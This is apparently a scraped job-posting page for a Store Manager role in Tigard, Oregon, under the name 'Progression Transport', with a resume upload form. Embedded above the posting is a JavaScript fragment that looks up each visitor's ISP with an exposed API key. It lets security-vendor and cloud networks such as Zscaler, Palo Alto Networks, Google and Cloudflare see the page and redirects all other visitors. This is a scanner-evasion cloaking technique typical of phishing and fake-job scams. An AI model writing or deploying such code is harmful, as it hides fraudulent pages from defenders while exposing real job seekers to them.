Store Manager

Store Manager

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

We are seeking a dynamic Store Manager for our location in Tigard, Oregon. In this role, you will oversee daily store operations, ensure excellent customer service, and lead a team to achieve sales goals.

Responsibilities include managing staff, merchandising, inventory control, and maintaining a clean, safe shopping environment. You will develop staff skills, handle customer concerns, and implement promotional strategies to enhance store performance.

Ideal candidates possess strong leadership, excellent communication, and problem-solving skills. A passion for retail and a customer-focused attitude are essential.

Benefits include competitive salary, employee discounts, health insurance options, paid time off, and opportunities for career growth. Join our team and contribute to creating a fun, engaging shopping experience for our community.

Emploment Location
Oregon, Tigard

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf